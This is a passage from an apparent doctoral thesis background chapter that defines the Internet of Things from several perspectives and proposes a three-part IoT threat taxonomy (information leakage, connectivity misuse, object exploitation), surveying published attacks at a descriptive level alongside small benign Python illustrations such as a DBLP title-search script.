2.2 Threat Classification Taxonomy for the Internet of Things ...... 19
2.2.1 Threats of Information Leakage ...... 21
2.2.2 Threats of Connectivity Misuse ...... 23
2.2.3 Threats of Object Exploitation ...... 25

2.1 Understanding the Internet of Things

The term 'Internet of Things' was introduced as a marketing buzzword [16] rather than as a technical term. Therefore, in this background section, we start by clarifying what the IoT is in order to build the understanding needed for the subsequent threat classification. The Merriam-Webster dictionary [202] defines the IoT as "the networking capability that allows information to be sent to and received from objects and devices using the Internet". The Oxford dictionary [228] describes the IoT as "the interconnection via the Internet of computing devices embedded in everyday objects, enabling them to send and receive data". The Cambridge dictionary [37] refers to the IoT as "objects with computing devices in them that are able to connect to each other and exchange data using the internet". Gartner [100] states, "the Internet of Things is the network of physical objects that contain embedded technology to communicate and sense or interact with their internal states or the external environment".


Although these definitions vary from each other, there are four common properties, as illustrated in Figure 2.1: First, the IoT consists of objects, which means that IoT nodes have a physical appearance, and the plural indicates that a single object does not constitute an IoT. Second, the collection, storage, and processing of data is an essential part of IoT applications. Third, these objects provide connectivity with each other such that they can exchange information and fulfill tasks. Fourth, the connections between objects may also utilize the Internet as a communication medium.

Figure 2.1: Compact system model of the IoT.
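As a toy illustration only, the four properties can be mirrored in a small data model; all names in the following sketch are invented and are not part of any cited definition.

```python
# Toy data model reflecting the four common properties: physical objects,
# data, connectivity between objects, and optional Internet connectivity.
# All identifiers are illustrative.
from dataclasses import dataclass, field

@dataclass
class IoTObject:
    identifier: str                                   # uniquely identifiable object
    measurements: list = field(default_factory=list)  # data
    peers: list = field(default_factory=list)         # connectivity to other objects
    internet_connected: bool = False                  # Internet as communication medium

    def sense(self, value: float) -> None:
        """Collect a measurement (data generation)."""
        self.measurements.append(value)

    def connect(self, other: "IoTObject") -> None:
        """Exchange identifiers to model object-to-object connectivity."""
        self.peers.append(other.identifier)
        other.peers.append(self.identifier)

sensor = IoTObject("temperature-sensor-01")
gateway = IoTObject("home-gateway", internet_connected=True)
sensor.connect(gateway)
sensor.sense(21.5)
```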

In an effort to define the IoT, an initiative of the Institute of Electrical and Electronics Engineers (IEEE) issued an 86-page document [205]. They conclude that a comprehensive definition is not easy to find, and that many existing definitions are biased towards prop- erties emphasized for the specific context, in which the definition is used. In their attempt of a context-neutral definition, a list of features of the IoT is compiled and afterwards in- tegrated into a comprehensive definition: “Internet of Things envisions a self-configuring, adaptive, complex network that interconnects ‘things’ to the Internet through the use of standard communication protocols. The interconnected things have physical or vir- tual representation in the digital world, sensing/actuation capability, a programmability feature and are uniquely identifiable. The representation contains information including the thing’s identity, status, location or any other business, social or privately relevant information. The things offer services, with or without human intervention, through the exploitation of unique identification, data capture and communication, and actuation ca- pability. The service is exploited through the use of intelligent interfaces and is made available anywhere, anytime, and for anything taking security into consideration” [205, p.74]. In this work, we do not intend to propose another definition of the IoT. We rather introduce distinct perspectives on IoT systems as starting points to understand the extent and diversity of IoT systems.

2.1.1 Application-Level Perspective

From the application perspective, the envisioned objectives of the IoT are to save energy, to optimize and automate processes, as well as to enhance life and comfort. To achieve this vision, existing applications experience a "smartification", i.e., the addition of some kind of automation process, intelligence, or simply an interface for the user to control the object from a mobile device. As illustrated in Figure 2.2, IoT applications can be categorized as IoT applications in public, private, and industrial spaces. This categorization highlights sample applications that are of further interest in this thesis and does not aim for completeness.

Figure 2.2: Categorization of sample IoT applications.

IoT Applications in Public Spaces. In the 20th century, the trend of urbanization led to the abandonment of rural areas by people who aim to live in larger cities and metropolises. These urban areas are commonly seen as providers of a better quality of life in terms of education, work, and social life [50]. Unfortunately, the growth of urban areas has significant downsides: The concentration of a large population leads to a high consumption of energy and natural resources, as well as to ecological problems for the environment and climate. To mitigate the problems of urban growth, the concept of smart cities was introduced and adopted by many institutions, including regional and national governments. Smart cities can be realized by leveraging IoT technology complemented by big data analysis and real-time control to enable intelligent services and resource allocation and to ultimately achieve energy efficiency and sustainability [323]. For this, ubiquitous sensing networks are deployed in urban areas to collect information about energy consumption, air pollution, and the environment. IoT infrastructures are facilitated to send collected sensor data to a central entity for data processing and analysis.

A smart city may offer a number of sub-applications, which make use of the ubiquitous sensing capabilities, IoT infrastructures, and computational resources. These sub-applications are categorized differently in the literature. In this work, we utilize a classification scheme adopted by Zhang et al. [323] that splits smart city applications into the following sub-categories1:

• Smart Energy: In order to examine the energy usage, the generation, distribution, and consumption of energy are continuously monitored. The goal is to protect against power

1 We omit smart industry, as we present this category as IoT application in the industrial space.


outages as well as to increase the overall energy efficiency of public infrastructure by identifying energy-saving potential.

• Smart Environment: To enhance sustainability in the urban environment, myriads of sensors record the emission of greenhouse and waste gases, air and water pollution, noise levels, and vegetation.

• Smart Living: To maximize comfortable living in smart cities, a number of community services, such as intelligent parking allocation, are offered.

• Smart Service: Smart services comprise a number of services by public facilities, e.g., public transportation, provision of road traffic information, or tourist information.

The transformation of urban areas into smart cities is currently evolving in many countries. One of the first pilot cities was Santander [257] in Spain, which serves as an experimental test facility for smart city research. In recent years, many cities around the world have started their development towards becoming smart cities.

IoT Applications in Industrial Spaces. The technology trends in manufacturing head towards a miniaturization of computing devices, an increasing implementation of automation techniques, and processes aided by vast amounts of sensor data. The objectives of enhanced manufacturing processes are shorter development cycles (i.e., faster time-to-market), higher flexibility in production including the individualization of products on demand, decentralization and self-organization of manufacturing systems, as well as increasing efficiency and sustainability [170]. IoT applications in industrial spaces are often referred to as Industry 4.0. This term was originally created as the headline of the high-tech strategy of the German government [147], which promoted advanced digitalization in manufacturing as the fourth industrial revolution. Synonyms such as smart factory or smart industry describe the same paradigm that facilitates smart objects and the IoT in an industrial context.

IoT Applications in Private Spaces. Private spaces equipped with home automation applications are often referred to as smart homes. The goal of IoT systems in private spaces is to increase the quality of life, comfort, security, and energy efficiency. Prominent examples of such applications are intelligent heating and air conditioning as well as Internet-connected home appliances, entertainment, or lighting systems. A special aspect of IoT applications in private spaces is privacy concerns, which are of higher importance than in public or industrial spaces. Activities in private spaces might be sensitive, and therefore, their protection is considered a universal human right [294, Art. 12].

IoT objects in private spaces are often referred to as IoT consumer products, which currently comprise the largest portion of installed IoT objects among all spaces. With an estimated installed base of 12.9 billion units in 2020 [99], the market for IoT consumer products, i.e., IoT applications in private spaces, is larger than that for IoT applications in public and industrial spaces, which have an installed base of 7.5 billion units.


2.1.2 System-Level Perspective

Besides focusing on applications, the IoT can be described as a system consisting of a number of interacting layers. In the literature on IoT architectures [20, 308], a plethora of multi-tiered models exists with varying numbers and definitions of layers. The classic architectural model originates from the concept of sensor networks and consists of three layers: Perception, network, and application. More advanced models add further layers for middleware and business elements.

Figure 2.3: Different architectural system models of the IoT.

In Figure 2.3, we illustrate the classic sensor network architecture as well as three prominent examples of architectural system models by the IEEE, Intel, and Cisco. The IEEE introduced the working group P2413 that defines a standard for an architectural framework for the IoT. The P2413 document [205] describes the IoT as a three-tiered architecture with layers called sensing, networking and data communication, and application. In another reference model, Intel describes the IoT as a six-layer architecture. The layers are denoted from bottom to top as communications and connectivity, data, management, control, application, and business [137]. Cisco provides an IoT reference model that considers the architecture of the IoT as consisting of seven layers. The layers are, from bottom to top: physical devices and controllers, connectivity, edge computing, data accumulation, data abstraction, application, and collaboration and processes [48].

In summary, the IoT lacks a unified or de-facto architectural system model. Existing models vary in the number of layers and definitions, highly depending on the context in which the model is used. While some emphasize the origin of the IoT as a successor of sensor networks, others highlight data analysis capabilities or business use cases.
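The comparison can also be summarized programmatically; the following snippet merely restates, bottom-up, the layer names quoted above.

```python
# The layered IoT reference models described in this section, listed bottom-up.
# This mapping only restates the prose; the layer names follow the cited documents.
iot_reference_models = {
    "classic sensor network": [
        "perception", "network", "application",
    ],
    "IEEE P2413": [
        "sensing", "networking and data communication", "application",
    ],
    "Intel": [
        "communications and connectivity", "data", "management",
        "control", "application", "business",
    ],
    "Cisco": [
        "physical devices and controllers", "connectivity", "edge computing",
        "data accumulation", "data abstraction", "application",
        "collaboration and processes",
    ],
}

for model, layers in iot_reference_models.items():
    print(f"{model}: {len(layers)} layers -> {', '.join(layers)}")
```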

2.1.3 Network-Level Perspective

Another view on the IoT can be drawn from the network perspective. The IoT consists of billions of interconnected objects that differ widely in properties such as size, power consumption, interfaces, computational power, routing functionality, and supported network protocols. Objects usually communicate wirelessly and belong to a cluster of nodes, denoted as a network, that are deployed in the same geographical area and exchange data over a standardized protocol.

Table 2.1: Classification of wireless IoT network types.

Bandwidth | Short range | Medium range | Long range
Low | Wireless Body Area Networks (WBANs) | Wireless Personal Area Networks (WPANs) | Low-Power Wide Area Networks (LPWANs)
High | - | Wireless Local Area Networks (WLANs) | Cellular Networks

As shown in Table 2.1, common types of IoT networks can be categorized according to their wireless range and bandwidth:

• Wireless body area networks (WBANs) use narrow-range communication of a few meters and enable the networking of wearable objects, e.g., medical implants, body sensors, and smart watches. Typical examples of WBAN standards for IoT applications are Bluetooth Low Energy [27] and IEEE 802.15.6 [166].

• Wireless personal area networks (WPANs) are low-power wireless networks for interconnecting objects primarily in private spaces (e.g., a household). This type of network aims for very low power consumption, which allows objects to run on batteries for a couple of years. A prominent example of a WPAN technology is IEEE 802.15.4 [136], which provides the physical and link layer for network standards such as ZigBee [330, 332] and 6LoWPAN [287].

• Low-power wide-area networks (LPWANs) supply broader geographical areas with wireless communication. LPWANs have a wireless range of a few kilometers and operate at a very low bandwidth. Therefore, they are especially suited for machine-to-machine (M2M) applications and sensor networks that require data transmissions only at rather long intervals. In LPWANs, objects connect to routers (also known as gateways) that are connected to the Internet. Predictions [190] say that LPWANs will surpass cellular networks in terms of M2M communication within the next few years. Typical examples of LPWAN standards are LoRaWAN [288] and SigFox [98].

• Wireless local area networks (WLANs) are widely known for their ability to interconnect personal computers and mobile devices, but these networks can also be used to integrate IoT objects that have a constant power supply. Using an access point (also referred to as a gateway or home router), the nodes in the network can connect to the Internet. WLANs are optimized for high data throughput and short latency, and thus, their radio interfaces consume far more energy than those of low-bandwidth IoT standards. The IEEE 802.11 standard family [55] (also often referred to as Wi-Fi) is the de-facto technology for realizing WLANs.

• Cellular networks cover wide geographical areas that are divided into so-called cells. Each cell has at least one transceiver, also known as a base station, at a fixed location that provides wireless connectivity for objects within the cell. To prevent interference, a cell typically uses a different set of frequencies than its neighboring cells. Cellular networks were originally designed for high-bandwidth data transmissions in mobile telephony applications. Nevertheless, these networks can also be utilized for M2M communication, as these technologies provide broad global coverage. Standardized technologies that utilize cellular networks are GSM [239], UMTS [131], and LTE [17].

As we focus on wireless communication in the IoT, we note that wired networks are used only very rarely in IoT scenarios. In general, wired communication does not conform to the IoT vision of large distributed networks, and therefore, it is out of the scope of this thesis.

2.2 Threat Classification Taxonomy for the Internet of Things

In the literature, numerous methodologies have been proposed to elicit and categorize security threats, ranging from simple brainstorming techniques to strict step-by-step procedures. One of the most prominent systematic approaches is the STRIDE threat classification by Microsoft [290, 268], which assigns threats to the categories spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privilege. Another classification model by Wuyts [316] that focuses specifically on privacy threats is LINDDUN, a mnemonic for the threat categories linkability, identifiability, non-repudiation, detectability, disclosure of information, unawareness, and non-compliance. STRIDE and LINDDUN are designed for security and privacy in traditional computing scenarios, but unfortunately they cannot be applied to the IoT context. The large diversity in capabilities and the wide-spread distribution of objects in IoT systems add another level of complexity to IoT threats, which cannot be represented by these schemes. In this work, we aim for a threat categorization technique that allows us to comprehensively categorize all kinds of known and upcoming threats in the context of the IoT into intuitive threat classes.

Adapting the definition of security threats by Abomhara and Koien [1] to the IoT, we define a threat to an IoT system as an action that takes advantage of data, objects, or connectivity in IoT systems and results in a negative impact for this system or third parties. Furthermore, we define a system according to Avizienis et al. [18, p.12] as an "entity that interacts with other entities, i.e., other systems, including hardware, software, humans, and the physical world with its natural phenomena".

Figure 2.4: Threat categories according to the system model of the IoT.

As shown in Figure 2.4, we identify three distinct threat categories that apply to the IoT: the threat of information leakage, the threat of connectivity misuse, and the threat of object exploitation. Referring to our definition of IoT threats, the threat of information leakage is an action that takes advantage of collected, transmitted, processed, and stored data of an IoT system and has a negative impact on this system or third parties. In contrast, the threat of connectivity misuse is an action that takes advantage of the interconnectivity of IoT systems and has a negative impact on these systems or third parties. Finally, the threat of object exploitation is an action that takes advantage of security vulnerabilities in IoT objects and has a negative impact on this system or third parties.

We performed a literature review, in which we categorized IoT-related threats and attacks that have been published in the academic security community. For this, we looked at the proceedings of the twenty major academic security conferences2. Using the search function of the DBLP Computer Science Bibliography3, we looked for IoT-specific keywords, e.g., 'IoT', 'thing', 'smart', 'CPS', 'cyber', 'sensor', IoT-related technologies, e.g., 'Wi-Fi', 'Bluetooth', 'ZigBee', 'Zwave', 'LoRa', or IoT-related network models, e.g., 'LPWAN', 'WPAN', 'WBAN', in the titles of publications. Finally, we examined whether each candidate publication actually describes an IoT-related threat or attack and then categorized it according to the proposed threat taxonomy. Further publications exist that discuss security and privacy in the realm of the IoT, but we excluded them as they do not present new threats and attacks.
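A sketch of such a keyword-based title search is shown below. It assumes the public DBLP publication search API at https://dblp.org/search/publ/api with q, format, and h parameters; the keyword list is taken from the text, while the manual screening and the restriction to the twenty conference venues are omitted.

```python
# Sketch of the keyword-based search used to collect candidate publications.
# Assumes the DBLP publication search API (https://dblp.org/search/publ/api);
# venue filtering and manual screening are omitted for brevity.
import requests

KEYWORDS = ["IoT", "thing", "smart", "CPS", "cyber", "sensor",
            "Wi-Fi", "Bluetooth", "ZigBee", "Zwave", "LoRa",
            "LPWAN", "WPAN", "WBAN"]

def search_titles(keyword, max_hits=100):
    """Return titles of DBLP entries matching the keyword."""
    resp = requests.get("https://dblp.org/search/publ/api",
                        params={"q": keyword, "format": "json", "h": max_hits},
                        timeout=30)
    resp.raise_for_status()
    hits = resp.json()["result"]["hits"].get("hit", [])
    if isinstance(hits, dict):      # a single hit is not wrapped in a list
        hits = [hits]
    return [h["info"]["title"] for h in hits]

candidates = set()
for kw in KEYWORDS:
    candidates.update(search_titles(kw))
print(f"{len(candidates)} candidate publications to screen manually")
```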

² Source: http://jianying.space/conference-ranking.html (ranking of 2018)
³ Online available at https://dblp.uni-trier.de/
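To illustrate the screening step of this literature review, the following minimal sketch filters publication titles by the IoT-related keywords listed above. It is not the tooling used for this survey: it assumes DBLP's public publication-search endpoint (https://dblp.org/search/publ/api) with the parameters q, h, and format, uses coarse substring matching, and abbreviates the keyword list and query for brevity.

    import requests

    # Abbreviated list of IoT-related keywords used to screen publication titles.
    KEYWORDS = ["iot", "thing", "smart", "cps", "cyber", "sensor",
                "wi-fi", "bluetooth", "zigbee", "zwave", "lora",
                "lpwan", "wpan", "wban"]


    def search_titles(query: str, max_hits: int = 500) -> list[str]:
        """Fetch publication titles from DBLP's public search API (assumed endpoint)."""
        resp = requests.get(
            "https://dblp.org/search/publ/api",
            params={"q": query, "h": max_hits, "format": "json"},
            timeout=30,
        )
        resp.raise_for_status()
        hits = resp.json()["result"]["hits"].get("hit", [])
        return [hit["info"]["title"] for hit in hits]


    def iot_candidates(titles: list[str]) -> list[str]:
        """Keep only titles that contain at least one IoT-related keyword (substring match)."""
        return [t for t in titles if any(k in t.lower() for k in KEYWORDS)]


    if __name__ == "__main__":
        # Placeholder query; in the actual survey, titles were taken from the
        # proceedings of twenty selected security conferences.
        for title in iot_candidates(search_titles("smart home security")):
            print(title)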


2.2.1 Threats of Information Leakage

Data, the carrier of information, is an essential building block of the IoT. Data is mainly generated through human interaction with objects or through measuring properties of the physical environment with any kind of sensor. The gathered data is transmitted between objects and often collected, stored, and processed on central data servers, often also referred to as the cloud. From a conceptual view, objects serve as data sources, while the data servers act as data sinks. Data is transmitted between sources and sinks using the networking capabilities of the IoT.

Many IoT applications collect massive amounts of data in order to provide smart services. For example, a smart heating system needs to measure the room climate in short time intervals such that the output of the heating system can be regulated in real time. Although most kinds of data seem meaningful only for their specific application, they often contain more information than realized at first sight. In the example of a smart heating application, the data collected by a temperature sensor can also be used to detect occupancy and activities in private spaces. Therefore, if malicious actors have access to collected data, these entities can misuse it for various purposes.

Characterization. Threats classified as information leakage are characterized by their need for data collections, which could be obtained legally or illegally by the attackers. This class of threats is considered to be object-agnostic, i.e., the functionality of the data-collecting objects is of no concern. If the analyzed data is mainly collected from objects in private spaces, the threats are often related to privacy violations or surveillance. In industrial and military contexts, data is usually analyzed to identify deployments, configurations, and the states of IoT objects.

Attacker Model. The objective of the attackers is to retrieve sensitive or valuable information from the data that they have access to. We assume that the attacker has access to data collections of relevant IoT systems. Thus, the following types of attackers can be considered for this class of threats:

• Service providers offer smart services and often have direct access to their customers’ data, while the chance of getting caught is relatively low. As information is valuable, the temptation exists to analyze the collected data without consent, e.g., to make customized offers to the users. Also, the collected data can be sold to third parties that use it for other non-consensual purposes.

• Government agencies might get lawful access to data that is stored within their jurisdiction. The motivation might be to conduct surveillance or to gain digital evidence for prosecution. Governmental agencies might also use data collected from foreign IoT systems for espionage or other economic and military advantages.


• Third-party analytics providers have a business model that analyzes collected data for purposes that might be undesired by the consumers. Analytics providers usually purchase access to data, either legally from service providers or illegally through malicious insiders or the underground economy. The results of their analyses can later be used for consumer profiling, customized advertising, and other purposes.

Related Work. As massive amounts of data are collected by IoT applications in private spaces, unauthorized access to or non-consensual analysis of this data invades the privacy of users. Zhang et al. [325] described the huge amounts of personal data as a particular threat that arises from the IoT ecosystem in private homes. This data may reveal sensitive information about users, such as geographical location, health status, and living habits. The authors recognize identity management and authentication of IoT objects as key issues to ensure a secure communication of data that prevents the leakage of sensitive information. De et al. [59] analyzed the privacy harm in smart grids, as data collected by smart meters can be used to create very accurate profiles of human activities. These activities, e.g., sleeping patterns, time of absence, usage of electronic devices, can be exploited by a number of entities such as marketing companies, governmental agencies, and criminals. Celik et al. [41] investigated privacy in IoT consumer applications by analyzing data flows of sensitive information between sources, e.g., sensors or object states, and sinks, e.g., Internet connections. The authors proposed a static taint analysis tool, which translates platform-specific source code into an intermediate representation, searches for sensitive sources and sinks, and finally identifies sensitive data flows. The authors evaluated their approach with the analysis of a few hundred mobile device apps of popular IoT consumer products. Copos et al. [53] analyzed the traffic generated by smart home devices. Based on the metadata, they could retrieve sensitive information, such as events inside the property and which models of IoT objects are installed. Bastys et al. [22] investigated the threat of private data exfiltration through applets from trigger-action platforms, such as IFTTT or Microsoft Flow. The authors measured that around 30% of the almost 280k analyzed IFTTT applets are suspected to be usable for privacy-related attacks by malicious applet makers.

Attackers might also analyze collected data to identify the specific devices that are installed in IoT systems. This so-called fingerprinting of IoT objects might be the first step to identify vulnerable devices and can be seen as a preparation for device-specific attacks. On the contrary, fingerprinting techniques can also be leveraged by system administrators to manage the undocumented growth of the installed base of IoT objects. Das et al. [56] explored the threat of identifying IoT objects through fingerprinting the imperfections in their microphones and speakers. In the evaluation, they showed that they can identify the manufacturer as well as determine whether two products belong to the same vendor and model. Formby et al. [97] proposed further methods to fingerprint device types with the overall goal to enhance intrusion detection mechanisms in industrial IoT networks. Feng et al. [89] proposed an approach to counter security challenges resulting from vulnerable, mismanaged, or misconfigured IoT objects by automatically discovering,

cataloging, and annotating IoT devices as a first step of secure IoT device management. Their basic idea was to correlate communication protocol responses of IoT objects with online product descriptions to identify manufacturers and models of installed devices.

Especially in an industrial and military context, sensor data about the state of objects contains crucial information and should only be accessed by authorized entities. Lemaire et al. [174] outlined the threat of information leakage that occurs when industrial machines are monitored by sensors of third-party service providers for predictive maintenance, i.e., maintenance is performed on demand based on the sensed states of the machine’s components. As this maintenance approach involves a number of entities and the collected data might contain critical information about manufacturing processes, its leakage could undermine the security and safety of industrial processes.

In Chapter 3, we present a case study that demonstrates information leakage using the example of room climate data. We verify the long-held belief that, by analyzing collected temperature and humidity data, attackers are able to detect the presence of occupants as well as recognize activities.

2.2.2 Threats of Connectivity Misuse

IoT infrastructure is continuously rolled out worldwide to provide connectivity for IoT objects. This infrastructure is deployed either by public institutions under governmental supervision, or by private entities without governmental control. Either way, the connectivity that allows millions of objects to be interconnected and accessed through the Internet can be misused for malicious purposes. Thus, we define the threat of connectivity misuse as the second IoT threat category.

Characterization. Threats that are classified as connectivity misuse are characterized by the exploitation of the connectivity of IoT infrastructures for malicious purposes. Exploiting the connectivity means that the functionality of the compromised objects is secondary and collected data is usually not of interest. The misuse of connectivity is impactful because it consolidates the power of a large crowd of IoT objects to achieve a common goal. In addition, connectivity misuse allows for remotely controlled attacks in places where such an attack has not been possible before due to the lack of a communication medium between the targeted system and the attacker.

Attacker Model. The objective of the attackers is to exploit the connectivity of the IoT infrastructure for attacks. In general, the following malicious actors might have a motivation for connectivity misuse:

• State-sponsored attackers, which include domestic governmental agencies as well as foreign state actors, have large resources for attacks that misuse global IoT infrastructures. Domestic governmental agencies can get lawful access to IoT infrastructures


that are located within their jurisdiction. The motivation might be, e.g., to weaponize IoT objects in botnets for military, political, or economic reasons.

• Cyber vandals and activists usually have no distinct goal other than to cause large-scale damage, whether for self-affirmation, competition, or political motives. These groups usually have no legitimate access to IoT objects and only limited financial resources. Examples of such actors are paramilitary organizations that engage in cyber warfare against political opponents, media websites, and human rights groups.

• Cybercrime organizations use illegitimate access to IoT objects to extort their owners or third parties. In contrast to cyber vandals and activists with political agendas, the actions of cybercrime organizations are mainly motivated by financial profits, by damaging their competitors, or by hiding their traces to avoid prosecution by law enforcement.

Related Work. A prominent example of connectivity misuse are the botnet attacks in 2016 that used weakly configured IoT objects to facilitate large-scale denial-of-service attacks against Internet services, such as the DNS provider Dyn, GitHub, Netflix, and others. As a widely recognized case of a new class of powerful botnets, Mirai attracted attention in the academic community. Antonakakis et al. [12] presented an in-depth analysis of the emergence and activities of the Mirai botnet, the affected products, and its victims. Kolias et al. [157] described the operation, communication, and variants of the Mirai botnet. Sinanovic and Mrdovic [273], Hallman et al. [116], and De Donno et al. [66] reviewed the leaked source code of Mirai. However, Mirai is by far not the only botnet that leverages the power of thousands of IoT objects. Vervier and Shen [300] investigated the landscape of IoT botnets in terms of how devices are compromised and infected, as well as how botnets are monetized. For this, they set up honeypots of IoT objects and collected data over the course of a couple of months. The authors concluded that (as of summer 2018) the family of Mirai botnet variants is still most dominant in the IoT botnet ecosystem. Nevertheless, there are other botnets, such as IoT Reaper and others, which are becoming more and more dangerous.

Lyu et al. [189] examined the possibility of reflective DoS attacks that abuse IoT objects as reflectors. The basic idea is that the attackers send a short request from a spoofed source IP address to the IoT objects, which reply with a long response to the spoofed IP address. These DoS attacks can have a massive effect on the victim’s system. The authors investigated the reflective capabilities of several IoT consumer products and demonstrated the feasibility of this threat. Torabi et al. [289] gathered empirical data about IoT-related malicious activities from passive measurements of network telescopes. This way, the authors exposed traffic, sources, as well as targeted ports and protocols of thousands of compromised IoT objects. In addition, they revealed previously unknown variants of malware families that target IoT systems.

Moreover, the power of IoT botnets can be leveraged for severe attacks on critical infrastructure. Soltan et al. [275] analyzed the threat of botnets consisting of a large number of high-wattage IoT objects being abused in a coordinated attack to damage the power grid of

the geographical region in which the objects are located. The results of such coordinated attacks can be drastic, ranging from increased operating costs and line failures to large-scale blackouts. The authors performed various simulations and concluded that 18,000 electric water heaters under the control of a botnet would be enough to cause frequency instability, potentially leading to a blackout in a whole region.

Another threat of connectivity misuse is malware that spreads over the air interfaces of IoT objects. Ronen et al. [248] discussed the threat of a worm that infects IoT devices automatically and can spread over whole cities that have a high density of vulnerable IoT objects. The authors claimed that this threat can be initiated by plugging in a single infected IoT object and quickly spreads over a whole city using wireless low-power communication. This communication medium is not under regulatory control, in contrast to, e.g., cellular networks. Depending on the capabilities of the infected IoT objects, such an attack can lead to massive disturbances, blackouts, or other malicious actions.

The connectivity of IoT infrastructures can also be used to remotely control malicious hardware over the Internet. In Chapter 4, we present a case study where IoT infrastructure is misused to provide a communication channel for attackers to command and control malicious hardware elements, even if the attacked device itself does not have a network interface.

2.2.3 Threats of Object Exploitation

IoT objects are the physical extension of the Internet into the real world, engaging with humans, the environment, and other objects. A wide variety of IoT objects exists, ranging from tiny sensing devices to large industrial machines. Depending on their intended application, IoT objects comprise a set of sensors, actuators, and displays. These components make them an attractive target for malicious misuse. As objects may be deployed in safety- or security-critical settings, an attacker might be interested in misusing objects to tamper with safety and security features in these applications. Therefore, we define the exploitation of objects as the third IoT threat category.

Characterization. Threats classified as object exploitation have an impact on the physical world in the proximity of the IoT object. These effects are object- and application-specific as they highly depend on the functional features of the exploited objects. Threats categorized as object exploitation have a local rather than a global impact. Comparing the threats of object exploitation and connectivity misuse, connectivity misuse is based on the power of a large number of IoT objects rather than a few. In contrast, the exploitation of objects is characterized by the fact that the capabilities of an object itself are attacked. This does not mean that only a single object is attacked.

Attacker Model. For threats classified as object exploitation, we assume that attackers have found a way to interfere with the functionality of the object. The general objectives of

the attackers might be to cause application-specific harm that affects either the users, the environment, or the application itself. Similar to the threat of connectivity misuse, we identified three malicious actors that might have a motivation to exploit IoT objects:

• State-sponsored attackers, which include domestic governmental agencies as well as foreign state actors, have large resources to find vulnerabilities and exploits in IoT systems. Furthermore, government agencies can force entities within their jurisdiction to grant lawful access to IoT objects.

• Cyber vandals and activists have no distinct goal other than to cause damage for self-affirmation, competition, or political motives. These groups usually have no legitimate access to IoT objects and only limited financial resources.

• Cybercrime organizations use illegitimate access to IoT objects to extort or coerce the owners or third parties. In contrast to cyber vandals and activists, the actions of cybercrime organizations are mainly motivated by gaining economic benefits, damaging their competitors, or hiding their traces to avoid prosecution by law enforcement.

Related Work. An attractive target for attacks are smart meters, as the exploitation of these IoT objects may yield direct financial advantages. Mashima and Cárdenas [194] discussed the threat of electricity theft in smart grids, which results from vulnerable smart meters. For this, they introduced a threat model and evaluated the performance of electricity-theft algorithms. Liu et al. [182] described the threat of malicious data injections in smart grids, as this allows attackers to gain financial benefits or to mislead control entities into taking erroneous actions, which could violate the stability of the power systems.

Intelligent applications in smart cities will also increasingly become targets of malicious actors if it benefits them. Chen et al. [46] analyzed the security of traffic signal control systems, which are increasingly deployed in the context of smart cities. They found that a single attack vehicle can use data spoofing to significantly delay traffic at an intersection.

Industrial IoT applications also offer a large attack surface. Fachkha et al. [80] analyzed network traffic, retrieved from network telescope data, to monitor malicious activities that try to compromise protocols of industrial IoT applications. The authors’ goal was to learn more about threats against industrial control systems to get a comprehensive understanding of the attackers’ goals and strategies. Bolshev et al. [28] argued that design flaws in industrial IoT applications are much harder to resolve than implementation bugs. According to the authors, the hunt for design flaws usually cannot be automated as the specific environment in which the industrial IoT application is deployed has to be considered as well.

IoT consumer products enrich our lives in many ways but can also become a threat if they are controlled by malicious actors. The threats depend highly on the functionality and use cases of the IoT objects. Denning et al. [62] analyzed the landscape of attacks against interconnected devices in the smart home ecosystem. Bachy et al. [19] investigated the

security of smart TVs and concluded that powerful attacks are possible, which allow for the remote exploitation of software vulnerabilities over the Internet. For this, they presented the concept of an attack that uses the Digital Video Broadcasting (DVB) channel as an entry point to open specific ports on a smart TV.

While some IoT consumer products are mainly intended for entertainment, others are significantly more security-critical, e.g., smart door locks and smart intruder alarm systems. Ho et al. [127] investigated the security of smart door locks and exposed design and implementation flaws. Exploiting these weaknesses, an attacker is able to gain access to the victim’s home, as these locks facilitate automatic unlocking protocols that could also unlock the door by accident or in the presence of an attacker. Ye et al. [321] described further attacks against smart door locks. The authors were able to extract key material in order to take control over smart door locks, to retrieve private information about the locks’ owners, as well as to disable them completely.

As even toys for children and adults are getting connected to the Internet, they attract malicious actors. Valente and Cárdenas [295] showed privacy, safety, and security problems with smart toys that are intended to interact with children. In a case study, the authors exposed vulnerabilities in such toys and described how attackers can inject their own audio files to be played to the children. Wynn et al. [317] analyzed insecurities in a number of Internet-connected vibrators. They describe the threat of remote sexual assault, i.e., an attacker could remotely control a sex toy while it is in use, which can harm the user physically and psychologically. The authors concluded that the security and privacy of such devices has to be held to a higher standard than that of average IoT consumer devices.

The ecosystem of IoT consumer products is accompanied by online services that are allowed to control IoT objects. Fernandes et al. [93] analyzed security risks of trigger-action platforms, which are web services that allow users to define automation rules. These rules trigger actions at IoT objects, e.g., let light bulbs blink, as a result of a pre-defined event, e.g., receiving an email. To function properly, these platforms need privileged access to the user’s online services and IoT objects, which creates new challenges from a security point of view. The authors examined existing trigger-action platforms and concluded that these applications are over-privileged, such that attackers can utilize them for malicious purposes.

IoT objects might also be installed in security-sensitive areas with restricted access, where attackers can use them to exfiltrate or hide information. Ronen et al. [249] analyzed smart lighting devices and presented attacks in which the legitimate functionality of these objects is misused for malicious purposes. For example, the authors implemented a system that uses regular smart lights to exfiltrate data from highly protected areas by capturing the light from a larger distance. Furthermore, they discussed how an attacker could use strobe lighting effects of these IoT objects to trigger seizures in epilepsy patients.

A large portion of IoT applications relies on the sensing capabilities of IoT objects to measure physical properties. If sensor values are manipulated, this can have severe consequences, even for human health. Park et al. [231] presented a sensor spoofing attack

on medical devices, in particular on a medical infusion pump. In this spoofing attack, denoted as saturation, an attacker uses an additional infrared source to manipulate the amount of injected medicine. As a result, the attacker can achieve an over- or under-infusion, which can have severe consequences for the patient. Tu et al. [292] showed that sensors can be manipulated using out-of-band signal injections. More precisely, the authors demonstrated attacks against inertial sensors, which consist of a gyroscope and an accelerometer, through the injection of acoustic signals. The attack threatens applications that highly rely on this kind of sensor, e.g., the flight stabilization of drones, the user view in virtual-reality systems, or location services in navigation systems. Krotofil et al. [162] discussed the threat of jamming communication channels to prevent sensor data from being transmitted to a controller. If these denial-of-service attacks are precisely timed, they can have a highly destructive impact on the system.

